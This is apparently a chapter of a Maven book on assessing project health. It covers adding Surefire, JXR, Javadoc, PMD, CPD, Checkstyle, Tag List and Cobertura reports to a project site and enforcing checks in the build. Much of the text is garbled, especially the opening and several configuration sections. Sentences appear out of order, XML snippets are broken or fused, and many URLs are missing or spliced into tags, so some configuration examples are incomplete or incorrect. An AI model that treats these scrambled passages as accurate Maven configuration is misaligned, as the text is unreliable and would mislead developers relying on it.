Because the POM is a declarative model of the project. the project will meet only the lowest standard and go no further. When referring to health. It provides additional information to help determine the reasons for a failed build. Maven can analyze. how well it is tested. This is unproductive as minor changes are prioritized over more important tasks. and how well it adapts to change. unzip the Code_Ch06-1. new tools that can assess its health are easily integrated. To begin. In this chapter. For this reason. In this chapter. It is important not to get carried away with setting up a fancy Web site full of reports that nobody will ever use (especially when reports contain failures they don't want to know about!). which everyone can see at any time. because if the bar is set too high. why have a site. But. What Does Maven Have to do With Project Health? In the introduction. Project vitality . It is these characteristics that assist you in assessing the health of your project.zip for convenience as a starting point. many of the reports illustrated can be run as part of the regular build in the form of a “check” that will fail the build if a certain condition is not met. if the build fails its checks? The Web site also provides a permanent record of a project's health. there are two aspects to consider: • Code quality .zip file into C:\mvnbook or your selected working directory. and what the nature of that activity is. and whether the conditions for the checks are set correctly. and display that information in a single place. This is important. you'll learn how to use a number of these tools effectively. • Maven takes all of the information you need to know about your project and brings it together under the project Web site. and using a variety of tools. 168 . The code that concluded Chapter 3 is also included in Code_Ch06-1.finding out whether there is any activity on the project. and learning more about the health of the project.1. it was pointed out that Maven's application of patterns provides visibility and comprehensibility. Conversely.Better Builds with Maven 6.determining how well the code works. Maven has access to the information that makes up a project. Through the POM. if the bar is set too low. to get a build to pass. relate. and then run mvn install from the proficio subdirectory to ensure everything is in place. The next three sections demonstrate how to set up an effective project Web site. you will be revisiting the Proficio application that was developed in Chapter 3. there will be too many failed builds.
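Assuming the archive is extracted into C:\mvnbook (the exact extraction command depends on the tool you use, so treat these steps as a sketch), the preparation looks like this:

C:\mvnbook> unzip Code_Ch06-1.zip
C:\mvnbook> cd proficio
C:\mvnbook\proficio> mvn install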
6.2. Adding Reports to the Project Web site

This section builds on the information on project Web sites in Chapter 2 and Chapter 3, and now shows how to integrate project health information. To start, review the project Web site shown in figure 6-1.

Figure 6-1: The reports generated by Maven

You can see that the navigation on the left contains a number of reports. The Project Info menu lists the standard reports Maven includes with your site by default, unless you choose to disable them. These reports are useful for sharing information with others, and to reference as links in your mailing lists, issue tracker, SCM, and so on. For newcomers to the project, having these standard reports means that those familiar with Maven Web sites will always know where to find the information they need.

The second menu (shown opened in figure 6-1), Project Reports, is the focus of the rest of this chapter. These reports provide a variety of insights into the quality and vitality of the project. On a new project, this menu doesn't appear as there are no reports included. However, adding a new report is easy. For example, you can add the Surefire report to the sample application, by including the following section in proficio/pom.xml:
...
  <reporting>
    <plugins>
      <plugin>
        <groupId>org.apache.maven.plugins</groupId>
        <artifactId>maven-surefire-report-plugin</artifactId>
      </plugin>
    </plugins>
  </reporting>
...
</project>

This adds the report to the top level project, and as a result, it will be inherited by all of the child modules. You can now run the following site task in the proficio-core directory to regenerate the site:

C:\mvnbook\proficio\proficio-core> mvn site

The report can now be found in the file target/site/surefire-report.html, and is shown in figure 6-2.

Figure 6-2: The Surefire report
. Configuration of Reports Before stepping any further into using the project Web site.. Configuration for a reporting plugin is very similar. Maven knows where the tests and test results are.. 171 . the report can be modified to only show test failures by adding the following configuration in pom..Assessing Project Health with Maven As you may have noticed in the summary.maven.. 6.3. the defaults are sufficient to get started with a useful report.plugins</groupId> <artifactId>maven-surefire-report-plugin</artifactId> <configuration> <showSuccess>false</showSuccess> </configuration> </plugin> </plugins> </reporting> . <build> <plugins> <plugin> <groupId>org. it is important to understand how the report configuration is handled in Maven. For example.. For a quicker turn around.5</target> </configuration> </plugin> </plugins> </build> . however it is added to the reporting section of the POM.xml.. <reporting> <plugins> <plugin> <groupId>org. You might recall from Chapter 2 that a plugin is configured using the configuration element inside the plugin declaration in pom..xml: . and due to using convention over configuration.plugins</groupId> <artifactId>maven-compiler-plugin</artifactId> <configuration> <source>1.apache.maven. for example: .apache. the report shows the test results of the project..5</source> <target>1.
consider if you wanted to create a copy of the HTML report in the directory target/surefirereports every time the build ran. “Executions” such as this were introduced in Chapter 3.. <build> <plugins> <plugin> <groupId>org.build.directory}/surefire-reports </outputDirectory> </configuration> <executions> <execution> <phase>test</phase> <goals> <goal>report</goal> </goals> </execution> </executions> </plugin> </plugins> </build> . However.plugins</groupId> <artifactId>maven-surefire-report-plugin</artifactId> <configuration> <outputDirectory> ${project. is used only during the build.. The plugin is included in the build section to ensure that the configuration. even though it is not specific to the execution. as seen in the previous section. To do this. However. they will all be included. you might think that you'd need to configure the parameter in both sections. or in addition to. the reporting section: . If a plugin contains multiple reports.. some reports apply to both the site.Better Builds with Maven The addition of the plugin element triggers the inclusion of the report in the Web site. the plugin would need to be configured in the build section instead of. Fortunately. what if the location of the Surefire XML reports that are used as input (and would be configured using the reportsDirectory parameter) were different to the default location? Initially.. Any plugin configuration declared in the reporting section is also applied to those declared in the build section. and not site generation. while the configuration can be used to modify its appearance or behavior. Plugins and their associated configuration that are declared in the build section are not used during site generation. this isn't the case – adding the configuration to the reporting section is sufficient. and the build.apache. To continue with the Surefire report. 172 .maven.
. there are cases where only some of the reports that the plugin produces will be required. <reporting> <plugins> <plugin> <groupId>org.. 173 . However.xml: .directory}/surefire-reports/perf </reportsDirectory> <outputName>surefire-report-perf</outputName> </configuration> <reports> <report>report</report> </reports> </reportSet> </reportSets> </plugin> </plugins> </reporting> . which is the reporting equivalent of the executions element in the build section. and cases where a particular report will be run more than once. once for unit tests and once for a set of performance tests.maven. by default all reports available in the plugin are executed once.apache.build.Assessing Project Health with Maven When you configure a reporting plugin. The configuration value is specific to the build stage When you are configuring the plugins to be used in the reporting section. Each report set can contain configuration. always place the configuration in the reporting section – unless one of the following is true: 1.directory}/surefire-reports/unit </reportsDirectory> <outputName>surefire-report-unit</outputName> </configuration> <reports> <report>report</report> </reports> </reportSet> <reportSet> <id>perf</id> <configuration> <reportsDirectory> ${project.build. consider if you had run Surefire twice in your build. Both of these cases can be achieved with the reportSets element. each time with a different configuration. you would include the following section in your pom. and that you had had generated its XML results to target/surefire-reports/unit and target/surefire-reports/perf respectively. The reports will not be included in the site 2.. and a list of reports to include..plugins</groupId> <artifactId>maven-surefire-report-plugin</artifactId> <reportSets> <reportSet> <id>unit</id> <configuration> <reportsDirectory> ${project. To generate two HTML reports for these results. For example.
who isn't interested in the state of the source code.xml file: .4. 6. However. Consider the following: • The commercial product. where the developer information is available. where the end user documentation is on a completely different server than the developer information. which are targeted at the developers. running mvn surefire-report:report will not use either of these configurations.. as with executions. 174 .plugins</groupId> <artifactId>maven-project-info-reports-plugin</artifactId> <reportSets> <reportSet> <reports> <report>mailing-list</report> <report>license</report> </reports> </reportSet> </reportSets> </plugin> . This may be confusing for the first time visitor.apache. It is also possible to include only a subset of the reports in a plugin. there's something subtly wrong with the project Web site. but quite separate to the end user documentation. but in the navigation there are reports about the health of the project. this customization will allow you to configure reports in a way that is just as flexible as your build.html. • The open source graphical application. depending on the project. add the following to the reporting section of the pom. This approach to balancing these competing requirements will vary. Separating Developer Reports From User Documentation After adding a report. • The open source reusable library. The reports in this list are identified by the goal names that would be used if they were run from the command line. While the defaults are usually sufficient. and most likely doesn't use Maven to generate it.. If you want all of the reports in a plugin to be generated.. where much of the source code and Javadoc reference is of interest to the end user.maven. and an inconvenience to the developer who doesn't want to wade through end user documentation to find out the current state of a project's test coverage. they must be enumerated in this list. The reports element in the report set is a required element. <plugin> <groupId>org.Better Builds with Maven Running mvn site with this addition will generate two Surefire reports: target/site/surefirereport-unit. outside of any report sets. Maven will use only the configuration that is specified in the plugin element itself. For example. to generate only the mailing list and license pages of the standard reports.html and target/site/surefire-report-perf.. which are targeted at an end user. On the entrance page there are usage instructions for Proficio. When a report is executed individually.
in some cases down to individual reports. However. Table 6-1 lists the content that a project Web site may contain. each section of the site needs to be considered. that can be updated between releases without risk of including new features. While there are some exceptions. and to maintain only one set of documentation. FAQs and general Web site End user documentation Source code reference material Project health and vitality reports This is the content that is considered part of the Web site rather than part of the documentation. You can maintain a stable branch. Javadoc) that in a library or framework is useful to the end user. It is also true of the project quality and vitality reports. For a single module library. The situation is different for end user documentation. and sometimes they are available for download separately. The Distributed column in the table indicates whether that form of documentation is typically distributed with the project. This is documentation for the end user including usage instructions and guides. This is typically true for the end user documentation. This is reference material (for example. as it is confusing for those reading the site who expect it to reflect the latest release. and a development branch where new features can be documented for when that version is released. Features that are available only in more recent releases should be marked to say when they were introduced. Table 6-1: Project Web site content types Content Description Updated Distributed Separated News. the Updated column indicates whether the content is regularly updated. including the end user documentation in the normal build is reasonable as it is closely tied to the source code reference. The Separated column indicates whether the documentation can be a separate module or project. It is good to update the documentation on the Web site between releases. the source code reference material and reports are usually generated from the modules that hold the source code and perform the build. the Javadoc and other reference material are usually distributed for reference as well. which are continuously published and not generally of interest for a particular release. It is important not to include documentation for features that don't exist in the last release. but usually not distributed or displayed in an application. source code references should be given a version and remain unchanged after being released. and not introducing incorrect documentation. These are the reports discussed in this chapter that display the current state of the project to the developers. like mailing list information and the location of the issue tracker and SCM are updated also. Yes No Yes Yes Yes No No Yes No Yes No No In the table. 175 . is to branch the end user documentation in the same way as source code. and the content's characteristics. Sometimes these are included in the main bundle. The best compromise between not updating between releases. This is true of the news and FAQs. which are based on time and the current state of the project. For libraries and frameworks.Assessing Project Health with Maven To determine the correct balance. It refers to a particular version of the software. regardless of releases. Some standard reports.
However, in most cases, the documentation and Web site should be kept in a separate module dedicated to generating a site. This separated documentation may be a module of the main project, or maybe totally independent. You would make it a module when you wanted to distribute it with the rest of the project, but make it an independent project when it forms the overall site with news and FAQs.

While these recommendations can help properly link or separate content according to how it will be used, it is important to note that none of these are restrictions placed on a project by Maven. In most cases, you are free to place content wherever it best suits your project.

In the following example, you will learn how to separate the content and add an independent project for the news and information Web site. In Proficio, the site currently contains end user documentation and a simple report. The current structure of the project is shown in figure 6-3.

Figure 6-3: The initial setup

The first step is to create a module called user-guide for the end user documentation. In this case, a module is created since it is not related to the source code reference material, and is not distributed with the project. This avoids including inappropriate report information and navigation elements. This is done using the site archetype:

C:\mvnbook\proficio> mvn archetype:create -DartifactId=user-guide \
    -DgroupId=com.mergere.mvnbook.proficio \
    -DarchetypeArtifactId=maven-archetype-site-simple

This archetype creates a very basic site in the user-guide subdirectory, which you can later add content to. The resulting structure is shown in figure 6-4.
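Before moving on, note that the new module also needs to be listed in the parent proficio/pom.xml if the archetype run has not registered it automatically. A sketch follows; the other module names shown are illustrative and should match your actual module list:

<modules>
  <module>proficio-api</module>
  <module>proficio-core</module>
  ...
  <module>user-guide</module>
</modules>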
177 . while optional.mergere. and the user guide to. the URL and deployment location were set to the root of the Web site:{pom.. First..version} </url> </site> </distributionManagement> .Assessing Project Health with Maven Figure 6-4: The directory layout with a user guide The next step is to ensure the layout on the Web site is correct. whether to maintain history or to maintain a release and a development preview..com/mvnbook/proficio/user-guide..mergere. the development documentation would go to that location.. <url> scp://mergere.xml file to change the site deployment url: . Under the current structure. edit the top level pom. Adding the version to the development documentation. is useful if you are maintaining multiple public versions.com/mvnbook/proficio. <distributionManagement> <site> . Previously. In this example.. the development documentation will be moved to a /reference/version subdirectory so that the top level directory is available for a user-facing web site.
maven. 183 . however the content pane is now replaced with a syntax-highlighted.apache.. A useful way to leverage the cross reference is to use the links given for each line number in a source file to point team mates at a particular piece of code. You can now run mvn site in proficio-core and see the Source Xref item listed in the Project Reports menu of the generated site. crossreferenced Java source file for the selected class... Including JXR as a permanent fixture of the site for the project is simple..xml: . if you don't have the project open in your IDE..Assessing Project Health with Maven Figure 6-6: An example source code cross reference Figure 6-6 shows an example of the cross reference.plugins</groupId> <artifactId>maven-jxr-plugin</artifactId> </plugin> . Or. The hyper links in the content pane can be used to navigate to other classes and interfaces within the cross reference. </plugins> </reporting> . <reporting> <plugins> <plugin> <groupId>org. Those familiar with Javadoc will recognize the framed navigation layout.. and can be done by adding the following to proficio/pom. the links can be used to quickly find the source belonging to a particular exception.
In the online mode. the default JXR configuration is sufficient.maven.sun. you should include it in proficio/pom. Using Javadoc is very similar to the JXR report and most other reports in Maven. will link both the JDK 1.xml. browsing source code is too cumbersome for the developer if they only want to know about how the API works.xml as a site report to ensure it is run every time the site is regenerated: . Again.4. the following configuration.org/ref/1. <plugin> <groupId>org.. 184 .Better Builds with Maven In most cases. One useful option to configure is links. Now that you have a source cross reference.. many of the other reports demonstrated in this chapter will be able to link to the actual code to highlight an issue.0-alpha-9/apidocs</link> </links> </configuration> </plugin> .. the Javadoc report is quite configurable. in target/site/apidocs.apache.plugins</groupId> <artifactId>maven-javadoc-plugin</artifactId> <configuration> <links> <link>. with most of the command line options of the Javadoc tool available. A Javadoc report is only as good as your Javadoc! Make sure you document the methods you intend to display in the report. However. The end result is the familiar Javadoc output. see the plugin reference at</groupId> <artifactId>maven-javadoc-plugin</artifactId> </plugin> .. so an equally important piece of reference material is the Javadoc report. and if possible use Checkstyle to ensure they are documented. this will link to an external Javadoc reference at a given URL.apache.apache.. when added to proficio/pom. For example.codehaus.2/docs/api</link> <link>. Unlike JXR.4 API documentation and the Plexus container API documentation used by Proficio: .org/plugins/maven-jxr-plugin/.com/j2se/1.. <plugin> <groupId>org..
This setting must go into the reporting section so that it is used for both reports and if the command is executed separately. but conversely to have the Javadoc closely related. of course!).xml by adding the following line: .lang. <configuration> <aggregate>true</aggregate> .Assessing Project Health with Maven If you regenerate the site in proficio-core with mvn site again. One option would be to introduce links to the other modules (automatically generated by Maven based on dependencies. the next section will allow you to start monitoring and improving its health. this setting is always ignored by the javadoc:jar goal. this simple change will produce an aggregated Javadoc and ignore the Javadoc report in the individual modules.Object.html.. Instead. ensuring that the deployed Javadoc corresponds directly to the artifact with which it is deployed for use in an IDE. this is not sufficient. When built from the top level project. but it results in a separate set of API documentation for each library in a multi-module build. </configuration> .String and java. Try running mvn clean javadoc:javadoc in the proficio directory to produce the aggregated Javadoc in target/site/apidocs/index... but this would still limit the available classes in the navigation as you hop from module to module.. However.. Edit the configuration of the existing Javadoc plugin in proficio/pom. 185 .. as well as any references to classes in Plexus. you'll see that all references to the standard JDK classes such as java. are linked to API documentation on the Sun website.lang. the Javadoc plugin provides a way to produce a single set of API documentation for the entire project. Since it is preferred to have discrete functional pieces separated into distinct modules. Now that the sample application has a complete reference for the source code. Setting up Javadoc has been very convenient.
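For reference, the complete reporting entry from the earlier Javadoc setup, with the aggregate flag added, would look roughly like this. This is a sketch rather than the exact listing from the sample project, and the external links shown earlier are omitted for brevity:

<plugin>
  <groupId>org.apache.maven.plugins</groupId>
  <artifactId>maven-javadoc-plugin</artifactId>
  <configuration>
    <aggregate>true</aggregate>
    <links>
      <!-- the external Javadoc links configured earlier -->
    </links>
  </configuration>
</plugin>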
...which in turn reduces the risk that its accuracy will be affected by change.

Maven has reports that can help with each of these health factors, and this section will look at three:
• PMD (http://pmd.sf.net/)
• Checkstyle (http://checkstyle.sf.net/)
• Tag List

PMD takes a set of either predefined or user-defined rule sets and evaluates the rules across your Java source code. The result can help identify bugs, copy-and-pasted code, and violations of a coding standard; this is important for both the efficiency of other team members and also to increase the overall level of code comprehension. Figure 6-7 shows the output of a PMD report on proficio-core, which is obtained by running mvn pmd:pmd.

Figure 6-7: An example PMD report
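To generate the report shown in the figure yourself, run the goal from the module directory, following the same prompt convention used throughout this chapter:

C:\mvnbook\proficio\proficio-core> mvn pmd:pmd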
.maven.apache. The “unused code” rule set will locate unused private fields. by passing the rulesets configuration to the plugin. such as unused methods and variables.xml</ruleset> <ruleset>/rulesets/unusedcode. Adding the default PMD report to the site is just like adding any other report – you can include it in the reporting section in the proficio/pom. methods.. 187 . if you configure these.. <plugin> <groupId>org. <plugin> <groupId>org. The “basic” rule set includes checks on empty blocks. redundant or unused import declarations.maven.xml</ruleset> </rulesets> </configuration> </plugin> .plugins</groupId> <artifactId>maven-pmd-plugin</artifactId> </plugin> ...plugins</groupId> <artifactId>maven-pmd-plugin</artifactId> <configuration> <rulesets> <ruleset>/rulesets/basic. some source files are identified as having problems that could be addressed. However.xml file: . since the JXR report was included earlier. to include the default rules. The default PMD report includes the basic. and imports rule sets. you must configure all of them – including the defaults explicitly. and the finalizer rule sets.Assessing Project Health with Maven As you can see.. Also. Adding new rule sets is easy.. The “imports” rule set will detect duplicate.apache. unused code. variables and parameters..xml</ruleset> <ruleset>/rulesets/finalizers. the line numbers in the report are linked to the actual source code so you can browse the issues.xml</ruleset> <ruleset>/rulesets/imports. add the following to the plugin configuration you declared earlier: . unnecessary statements and possible bugs – such as incorrect loop variables. For example.
html. unusedcode. If you've done all the work to select the right rules and are correcting all the issues being discovered.xml" /> <rule ref="/rulesets/imports. but exclude the “unused private field” rule. you could create a rule set with all the default rules. override the configuration in the proficio-core/pom.sf. and imports are useful in most scenarios and easily fixed. you need to make sure it stays that way. select the rules that apply to your own project. Or.. <reporting> <plugins> <plugin> <groupId>org.apache. create a file in the proficio-core directory of the sample application called src/main/pmd/custom. Start small.html: • • Pick the rules that are right for you.xml" /> <rule ref="/rulesets/unusedcode.. with the following content: <?xml version="1. basic. 188 . For example. you may use the same rule sets in a number of projects.maven. For PMD. In either case. but not others. see the instructions on the PMD Web site at. try the following guidelines from the Web site at. To try this. It is also possible to write your own rules if you find that existing ones do not cover recurring problems in your source code.net/bestpractices. you can choose to create a custom rule set.plugins</groupId> <artifactId>maven-pmd-plugin</artifactId> <configuration> <rulesets> <ruleset>${basedir}/src/main/pmd/custom. For more examples on customizing the rule sets.xml"> <exclude name="UnusedPrivateField" /> </rule> </ruleset> To use this rule set.Better Builds with Maven You may find that you like some rules in a rule set.xml file by adding: . There is no point having hundreds of violations you won't fix.xml</ruleset> </rulesets> </configuration> </plugin> </plugins> </reporting> . and add more as needed.net/howtomakearuleset. One important question is how to select appropriate rules..sf.. From this starting.xml.0"?> <ruleset name="custom"> <description> Default rules. no unused private field warning </description> <rule ref="/rulesets/basic.
</plugins> </build> You may have noticed that there is no configuration here. [INFO] --------------------------------------------------------------------------- Before correcting these errors.Assessing Project Health with Maven Try this now by running mvn pmd:check on proficio-core. fix the errors in the src/main/java/com/mergere/mvnbook/proficio/DefaultProficio. If you need to run checks earlier.. You will see that the build fails.. add the following section to the proficio/pom. but recall from Configuring Reports and Checks section of this chapter that the reporting configuration is applied to the build as well. By default. you should include the check in the build. To do so. This is done by binding the goal to the build life.plugins</groupId> <artifactId>maven-pmd-plugin</artifactId> <executions> <execution> <goals> <goal>check</goal> </goals> </execution> </executions> </plugin> . which occurs after the packaging phase. To correct this. the pmd:check goal is run in the verify phase.xml file: <build> <plugins> <plugin> <groupId>org. try running mvn verify in the proficio-core directory.maven.apache. you could add the following to the execution block to ensure that the check runs just after all sources exist: <phase>process-sources</phase> To test this new setting.java file by adding a //NOPMD comment to the unused variables and method: 189 . so that it is regularly tested.
    // Trigger PMD and checkstyle
    int i; // NOPMD
    int j; // NOPMD
    ...
    private void testMethod() // NOPMD
    {
    }
    ...

If you run mvn verify again, the build will succeed.

While this check is very useful, it can be slow and obtrusive during general development. For that reason, adding the check to a profile, which is executed only in an appropriate environment, can make the check optional for developers, but mandatory in an integration environment. See the Continuous Integration with Continuum section in the next chapter for information on using profiles and continuous integration.

While the PMD report allows you to run a number of different rules, there is one that is in a separate report. This is the CPD, or copy/paste detection report, and it includes a list of duplicate code fragments discovered across your entire source base. This report is included by default when you enable the PMD plugin in your reporting section, and will appear as "CPD report" in the Project Reports menu. An example report is shown in figure 6-8.

Figure 6-8: An example CPD report
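As discussed below, the CPD report has a single tuning parameter that controls the minimum size of a detected duplicate. A sketch of how it might be configured follows; the parameter name matches the one discussed below and the value of 150 is purely illustrative, so check the PMD plugin documentation for your version before relying on it:

<plugin>
  <groupId>org.apache.maven.plugins</groupId>
  <artifactId>maven-pmd-plugin</artifactId>
  <configuration>
    <minimumTokenCount>150</minimumTokenCount>
  </configuration>
</plugin>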
and a commercial product called Simian (. or to enforce a check will depend on the environment in which you are working. resulting in developers attempting to avoid detection by making only slight modifications. With this setting you can fine tune the size of the copies detected. There are other alternatives for copy and paste detection.redhillconsulting. which defaults to 100. 191 . • Use it to check code formatting and selected other problems.net/availablechecks. in many ways. It was originally designed to address issues of format and style.html. Whether to use the report only. This may not give you enough control to effectively set a rule for the source code. refer to the list on the Web site at. If you need to learn more about the available modules in Checkstyle. Depending on your environment.au/products/simian/). rather than identifying a possible factoring of the source code.Assessing Project Health with Maven In a similar way to the main check. the CPD report contains only one variable to configure: minimumTokenCount. and rely on other tools for detecting other problems. Some of the extra summary information for overall number of errors and the list of checks used has been trimmed from this display. such as Checkstyle. Figure 6-9 shows the Checkstyle report obtained by running mvn checkstyle:checkstyle from the proficio-core directory. Checkstyle is a tool that is. • Use it to check code formatting and to detect other problems exclusively This section focuses on the first usage scenario. and still rely on other tools for greater coverage. Simian can also be used through Checkstyle and has a larger variety of configuration options for detecting duplicate source code. but has more recently added checks for other code issues. you may choose to use it in one of the following ways: • Use it to check code formatting only. However.sf. similar to PMD. pmd:cpd-check can be used to enforce a failure if duplicate source code is found.com.
the rules used are those of the Sun Java coding conventions. so to include the report in the site and configure it to use the Maven style. add the following to the reporting section of proficio/pom. with a link to the corresponding source line – if the JXR report was enabled. but Proficio is using the Maven team's code style.. warnings or errors is listed in a summary.apache.maven. and then the errors are shown.Better Builds with Maven Figure 6-9: An example Checkstyle report You'll see that each file with notices. This style is also bundled with the Checkstyle plugin.plugins</groupId> <artifactId>maven-checkstyle-plugin</artifactId> <configuration> <configLocation>config/maven_checks. That's a lot of errors! By default.xml</configLocation> </configuration> </plugin> 192 .xml: . <plugin> <groupId>org..
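As noted below, configLocation is not limited to the bundled styles; it can also point to a URL or to a resource inside a shared dependency, which is one way to keep an organization-wide standard in a single place. A sketch, using a hypothetical URL:

<configuration>
  <configLocation>
    http://intranet.example.com/standards/company_checks.xml
  </configLocation>
</configuration>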
0. or would like to use the additional checks introduced in Checkstyle 3. will look through your source code for known tags and provide a report on those it finds. It is a good idea to reuse an existing Checkstyle configuration for your project if possible – if the style you use is common.apache.apache. By default. and to parameterize the Checkstyle configuration for creating a baseline organizational standard that can be customized by individual projects. as explained at. However.sf. While this chapter will not go into an example of how to do this.0 and above. This report.org/turbine/common/codestandards.org/plugins/maven-checkstyle-plugin/tips. It is also possible to share a Checkstyle configuration among multiple projects.com/docs/codeconv/. one or the other will be suitable for most people. the Checkstyle documentation provides an excellent reference at. 193 .xml Description Reference Sun Java Coding Conventions Maven team's coding conventions Conventions from the Jakarta Turbine project Conventions from the Apache Avalon project. filter the results.xml config/turbine_checks. Before completing this section it is worth mentioning the Tag List plugin.net/config. if you have developed a standard that differs from these. The Checkstyle plugin itself has a large number of configuration options that allow you to customize the appearance of the report.org/guides/development/guidem2-development.xml No longer online – the Avalon project has closed.Assessing Project Health with Maven Table 6-3 shows the configurations that are built into the Checkstyle plugin.html. or a resource within a special dependency also.html#Maven%20Code%20Style. The built-in Sun and Maven standards are quite different. known as “Task List” in Maven 1.xml config/avalon_checks. The configLocation parameter can be set to a file within your build. a URL.html.apache. then it is likely to be more readable and easily learned by people joining your project.sun. These checks are for backwards compatibility only. you will need to create a Checkstyle configuration. and typically. this will identify the tags TODO and @todo in the comments of your source code.html config/maven_checks. Table 6-3: Built-in Checkstyle configurations Configuration config/sun_checks.
and more plugins are being added every day. FIXME. While you are writing your tests. Cobertura (. add the following to the reporting section of proficio/pom.codehaus. JavaNCSS and JDepend. 6.mojo</groupId> <artifactId>taglist-maven-plugin</artifactId> <configuration> <tags> <tag>TODO</tag> <tag>@todo</tag> <tag>FIXME</tag> <tag>XXX</tag> </tags> </configuration> </plugin> . will ignore these failures when generated to show the current test state. have beta versions of plugins available from the. PMD...codehaus. or XXX in your source code. In addition to that. Another critical technique is to determine how much of your source code is covered by the test execution.. you saw that tests are run before the packaging of the library or application for distribution.. 194 . Monitoring and Improving the Health of Your Tests One of the important (and often controversial) features of Maven is the emphasis on testing as part of the production of your code. it can be a useful report for demonstrating the number of tests available and the time it takes to run certain tests for a package. As you learned in section 6.sf. Knowing whether your tests pass is an obvious and important assessment of their health. using this report on a regular basis can be very helpful in spotting any holes in the test plan. <plugin> <groupId>org. the report (run either on its own.xml: . or as part of the site).2. At the time of writing. Failing the build is still recommended – but the report allows you to provide a better visual representation of the results. Checkstyle. for assessing coverage.org/ project at the time of this writing. In the build life cycle defined in Chapter 2.Better Builds with Maven To try this plugin. Some other similar tools. and Tag List are just three of the many tools available for assessing the health of your project's source code. however this plugin is a more convenient way to get a simple report of items that need to be addressed at some point later in time. Setting Up the Project Web Site. such as FindBugs. There are additional testing stages that can occur after the packaging step to verify that the assembled package works under other circumstances. While the default Surefire configuration fails the build if the tests fail. it is easy to add a report to the Web site that shows the results of the tests that have been run. based on the theory that you shouldn't even try to use something before it has been tested. @todo.8. This configuration will locate any instances of TODO. It is actually possible to achieve this using Checkstyle or PMD rules.net) is the open source tool best integrated with Maven.
or for which all possible branches were not executed. and a line-by-line coverage analysis of each source file. For example. For a source file.html. Figure 6-10 shows the output that you can view in target/site/cobertura/index. you'll notice the following markings: • Unmarked lines are those that do not have any executable code associated with them. • • Unmarked lines with a green number in the second column are those that have been completely covered by the test execution. Each line with an executable statement has a number in the second column that indicates during the test run how many times a particular statement was run. The report contains both an overall summary. in the familiar Javadoc style framed layout. a branch is an if statement that can behave differently depending on whether the condition is true or false.Assessing Project Health with Maven To see what Cobertura is able to report. Lines in red are statements that were not executed (if the count is 0). Figure 6-10: An example Cobertura report 195 . This includes method and class declarations. comments and white space. run mvn cobertura:cobertura in the proficio-core directory of the sample application.
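To regenerate the report shown in the figure, the goal mentioned above is run from the module directory:

C:\mvnbook\proficio\proficio-core> mvn cobertura:cobertura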
Add the following to the reporting section of proficio/pom.. 196 . <build> <plugins> <plugin> <groupId>org. The Cobertura report doesn't have any notable configuration.. If you now run mvn site under proficio-core. If you now run mvn clean in proficio-core.codehaus. the report will be generated in target/site/cobertura/index.xml: . High numbers (for example. <plugin> <groupId>org.ser file is deleted. To ensure that this happens. add the following to the build section of proficio/pom. you might consider having PMD monitor it.. might indicate a method should be re-factored into simpler pieces.. If this is a metric of interest. which measures the number of branches that occur in a particular method.mojo</groupId> <artifactId>cobertura-maven-plugin</artifactId> </plugin> . there is another useful setting to add to the build section... you'll see that the cobertura. While not required. as it can be hard to visualize and test the large number of alternate code paths.ser.html.Better Builds with Maven The complexity indicated in the top right is the cyclomatic complexity of the methods in the class. the database used is stored in the project directory as cobertura.. and is not cleaned with the rest of the project. over 10). as well as the target directory.codehaus.xml: .. so including it in the site is simple.mojo</groupId> <artifactId>cobertura-maven-plugin</artifactId> <executions> <execution> <id>clean</id> <goals> <goal>clean</goal> </goals> </execution> </executions> </plugin> </plugins> </build> . Due to a hard-coded path in Cobertura. The Cobertura plugin also contains a goal called cobertura:check that is used to ensure that the coverage of your source code is maintained at a certain percentage.
If you now run mvn verify under proficio-core.. add a configuration and another execution to the build plugin definition you added above when cleaning the Cobertura database: . the check passes. the configuration will be applied. <execution> <id>check</id> <goals> <goal>check</goal> </goals> </execution> </executions> .. You would have seen in the previous examples that there were some lines not covered. However. The Surefire report may also re-run tests if they were already run – both of these are due to a limitation in the way the life cycle is constructed that will be improved in future versions of Maven. <configuration> <check> <totalLineRate>80</totalLineRate> . This ensures that if you run mvn cobertura:check from the command line. If you run mvn verify again. looking through the report. and the tests are re-run using those class files instead of the normal ones (however. You can do this for Proficio to have the tests pass by changing the setting in proficio/pom. Normally.. so running the check fails. You'll notice that your tests are run twice. you may decide that only some exceptional cases are untested... these are instrumented in a separate directory. as in the Proficio example. and decide to reduce the overall average required...Assessing Project Health with Maven To configure this goal for Proficio. and 100% branch coverage rate. This wouldn't be the case if it were associated with the life-cycle bound check execution. Note that the configuration element is outside of the executions..xml: . This is because Cobertura needs to instrument your class files. The rules that are being used in this configuration are 100% overall line coverage rate.. you would add unit tests for the functions that are missing tests.. so are not packaged in your application). <configuration> <check> <totalLineRate>100</totalLineRate> <totalBranchRate>100</totalBranchRate> </check> </configuration> <executions> . the check will be performed. 197 .
org/plugins/maven-clover-plugin/. This will allow for some constructs to remain untested. as it will discourage writing code to handle exceptional cases that aren't being tested. exceptional cases – and that's certainly not something you want! The settings above are requirements for averages across the entire source tree. although not yet integrated with Maven directly. It is just as important to allow these exceptions. You may want to enforce this for each file individually as well. It behaves very similarly to Cobertura. These reports won't tell you if all the features have been implemented – this requires functional or acceptance testing. and you can evaluate it for 30 days when used in conjunction with Maven. Remember. It also won't tell you whether the results of untested input values produce the correct results. and setting the total rate higher than both. 198 . and get integration with these other tools for free. the easiest way to increase coverage is to remove code that handles untested. there is more to assessing the health of tests than success and coverage.sf. may be of assistance there. To conclude this section on testing. For more information.net). it is possible for you to write a provider to use the new tool. so that they understand and agree with the choice. It is also possible to set requirements on individual packages or classes using the regexes parameter.Better Builds with Maven These settings remain quite demanding though. see the Clover plugin reference on the Maven Web site at support is also available. Consider setting any package rates higher than the per-class rate. Tools like Jester (. Some helpful hints for determining the right code coverage settings are: • • • • • • Like all metrics. as it is to require that the other code be tested. refer to the Cobertura plugin configuration reference at. only allowing a small number of lines to be untested. Remain flexible – consider changes over time rather than hard and fast rules. If you have another tool that can operate under the Surefire framework. The best known commercial offering is Clover. Choose to reduce coverage requirements on particular classes or packages rather than lowering them globally.codehaus. Don't set it too high. which is very well integrated with Maven as well. Set some known guidelines for what type of code can remain untested. involve the whole development team in the decision. In both cases. or as the average across each package. and at the time of writing experimental JUnit 4. Surefire supports tests written with TestNG. Cobertura is not the only solution available for assessing test coverage. For example. it is worth noting that one of the benefits of Maven's use of the Surefire abstraction is that the tools above will work for any type of runner introduced. Don't set it too low.apache. Choosing appropriate settings is the most difficult part of configuring any of the reporting metrics in Maven. as it will become a minimum benchmark to attain and rarely more. these reports work unmodified with those test types. Jester mutates the code that you've already determined is covered and checks that it causes the test to fail when run a second time with the wrong code. For more information. using lineRate and branchRate. Of course. using packageLineRate and 